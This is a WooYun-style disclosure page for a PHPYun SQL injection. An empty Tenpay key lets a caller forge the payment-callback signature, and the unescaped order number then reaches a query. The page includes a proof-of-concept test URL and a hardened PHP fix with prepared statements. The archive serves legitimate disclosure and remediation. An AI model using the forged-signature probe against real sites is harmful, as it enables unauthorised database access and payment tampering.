WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles online -------- http://drop.zone.ci/
Disclosure timeline:
2013-11-22: details sent to the vendor, awaiting vendor handling
2013-11-22: vendor confirmed; details visible to the vendor only
2013-11-25: details opened to third-party security partners
2014-01-16: details opened to core white hats and domain experts
2014-01-26: details opened to regular white hats
2014-02-05: details opened to intern white hats
2014-02-20: details opened to the public
PHPYun job system (php云人才系统) SQL injection vulnerability
Summary: the Tenpay KEY is never initialized, so the payment-callback signature check can be passed and the order number reaches an unescaped SQL query, giving an injection!
/api/tenpay/return_url.php

    require_once(dirname(dirname(dirname(__FILE__)))."/data/db.config.php");
    require_once(dirname(dirname(dirname(__FILE__)))."/include/mysql.class.php");
    $db = new mysql($db_config['dbhost'], $db_config['dbuser'], $db_config['dbpass'], $db_config['dbname'], ALL_PS, $db_config['charset']);
    /* key */
    $key = $tenpay[sy_tenpaycode]; // the key was never defined, so $key is empty

========= tenpay_data.php

    <?php
    /*
     * Created on 2012
     * Link for [email protected]
     * This PHPYun.Rencai System Powered by PHPYun.com
     */
    $tenpaydata = array(
        "sy_weburl"     => "http://www.job.com",
        "sy_tenpayid"   => "",
        "sy_tenpaycode" => ""   // no KEY is defined, so it is empty
    );
    ?>

=========

    /* create the payment response object */
    $resHandler = new PayResponseHandler();
    $resHandler->setKey($key); // the key is still uninitialized
    // check the signature
    if($resHandler->isTenpaySign()) {

    // the verification routine:
    /**********************************
    function isTenpaySign() {
        $cmdno          = $this->getParameter("cmdno");
        $pay_result     = $this->getParameter("pay_result");
        $date           = $this->getParameter("date");
        $transaction_id = $this->getParameter("transaction_id");
        $sp_billno      = $this->getParameter("sp_billno");
        $total_fee      = $this->getParameter("total_fee");
        $fee_type       = $this->getParameter("fee_type");
        $attach         = $this->getParameter("attach");
        $key            = $this->getKey();
        $signPars = "";
        // build the signature string
        $signPars = "cmdno=" . $cmdno . "&" .
                    "pay_result=" . $pay_result . "&" .
                    "date=" . $date . "&" .
                    "transaction_id=" . $transaction_id . "&" .
                    "sp_billno=" . $sp_billno . "&" .
                    "total_fee=" . $total_fee . "&" .
                    "fee_type=" . $fee_type . "&" .
                    "attach=" . $attach . "&" .
                    "key=" . $key;
        $sign = strtolower(md5($signPars));
        // the key is empty and every other field is under the caller's control,
        // so the caller can generate the signature themselves; with no key set,
        // the check exists in name only
    ***********************************/

    // transaction number
    $transaction_id = $resHandler->getParameter("transaction_id");
    // this site's order number
    $sp_billno = $resHandler->getParameter("sp_billno");
    // amount, in cents
    $total_fee = $resHandler->getParameter("total_fee");
    // payment result
    $pay_result = $resHandler->getParameter("pay_result");
    // type
    $attach = $resHandler->getParameter("attach");
    if( "0" == $pay_result ) {
        //------------------------------
        // business processing begins
        //------------------------------
        // note: do not process the same order twice
        // note: check the returned amount
        // start processing this site's records
        echo "select * from `".$db_config["def"]."company_order` where `order_id`='$sp_billno'";
        $sql = $db->query("select * from `".$db_config["def"]."company_order` where `order_id`='$sp_billno'"); // $sp_billno goes into the query unescaped
        $row = mysql_fetch_array($sql);
Test method:
http://127.0.0.1/yun3/api/tenpay/return_url.php?sign=ba7b763f604fb46432eac7fb601c55c1&sp_billno=1%27&pay_result=0
Fix suggestion: filter the input~~
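As an added illustration of what "filter the input" needs to cover here, below is a hardened version of the callback handler. This is example code written for this page, not PHPYun's code and not the reporter's: the class name SafeTenpayResponse, the function lookupOrder, the table prefix argument and the in-memory SQLite check are all assumptions. It closes both halves of the issue the report describes: it refuses to run with an empty key instead of silently signing with key="", compares signatures in constant time, and binds sp_billno as a query parameter rather than concatenating it into SQL.

```php
<?php
// Added example (hypothetical, not PHPYun code): hardened Tenpay return_url handling.
// Assumes: the key is read from $tenpaydata['sy_tenpaycode'] by the caller, $pdo is a
// PDO connection, and $prefix is the trusted table prefix from the site config
// (it is config, not user input, so it may be interpolated into the table name).

final class SafeTenpayResponse
{
    // Same field order the original signature string uses.
    private const SIGNED_FIELDS = ['cmdno', 'pay_result', 'date', 'transaction_id',
        'sp_billno', 'total_fee', 'fee_type', 'attach'];

    private string $key;
    private array $params;

    public function __construct(string $key, array $params)
    {
        // With key === '' every signature is computable by the client, so the
        // check would be meaningless: fail closed instead of proceeding.
        if ($key === '') {
            throw new RuntimeException('Tenpay key is not configured');
        }
        $this->key = $key;
        $this->params = $params;
    }

    private function param(string $name): string
    {
        return isset($this->params[$name]) ? (string) $this->params[$name] : '';
    }

    // Rebuild the signature the way the original isTenpaySign() does.
    public function expectedSign(): string
    {
        $parts = [];
        foreach (self::SIGNED_FIELDS as $f) {
            $parts[] = $f . '=' . $this->param($f);
        }
        $parts[] = 'key=' . $this->key;
        return strtolower(md5(implode('&', $parts)));
    }

    public function isTenpaySign(): bool
    {
        // Constant-time comparison against the caller-supplied sign.
        return hash_equals($this->expectedSign(), strtolower($this->param('sign')));
    }
}

// Parameterized lookup: sp_billno is bound, never concatenated into the SQL text.
function lookupOrder(PDO $pdo, string $prefix, string $spBillno): ?array
{
    $stmt = $pdo->prepare("SELECT * FROM `{$prefix}company_order` WHERE `order_id` = :id");
    $stmt->execute([':id' => $spBillno]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Self-check on constructed data (offline; needs the pdo_sqlite extension).
$key = 'example-secret-key'; // constructed, not a real key
$params = ['cmdno' => '1', 'pay_result' => '0', 'date' => '20131122', 'transaction_id' => 'T1',
    'sp_billno' => "1'", 'total_fee' => '100', 'fee_type' => '1', 'attach' => ''];

$params['sign'] = (new SafeTenpayResponse($key, $params))->expectedSign();
echo 'correct sign accepted: ', var_export((new SafeTenpayResponse($key, $params))->isTenpaySign(), true), "\n";

$params['sign'] = str_repeat('0', 32);
echo 'wrong sign rejected: ', var_export(!(new SafeTenpayResponse($key, $params))->isTenpaySign(), true), "\n";

try {
    new SafeTenpayResponse('', $params);
    echo "FAIL: empty key was accepted\n";
} catch (RuntimeException $e) {
    echo 'empty key rejected: ', $e->getMessage(), "\n";
}

$pdo = new PDO('sqlite::memory:');
$pdo->exec("CREATE TABLE `py_company_order` (order_id TEXT, amount INTEGER)");
$pdo->exec("INSERT INTO `py_company_order` VALUES ('1', 100)");
echo 'lookup of "1\'" (quote is data, not SQL): ', var_export(lookupOrder($pdo, 'py_', "1'"), true), "\n";
echo 'lookup of "1": ', var_export(lookupOrder($pdo, 'py_', '1'), true), "\n";
```

The two defenses are independent: the key check stops the callback from being accepted at all when the deployment is misconfigured, and the prepared statement means that even a request that does pass verification cannot turn order_id into SQL. Dropping the debugging echo of the raw query, as the original does before running it, is also part of the cleanup.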
Severity: High
Vulnerability Rank: 20
Confirmed: 2013-11-22 18:55
Vendor reply: Thank you for the submission!
Fix details: none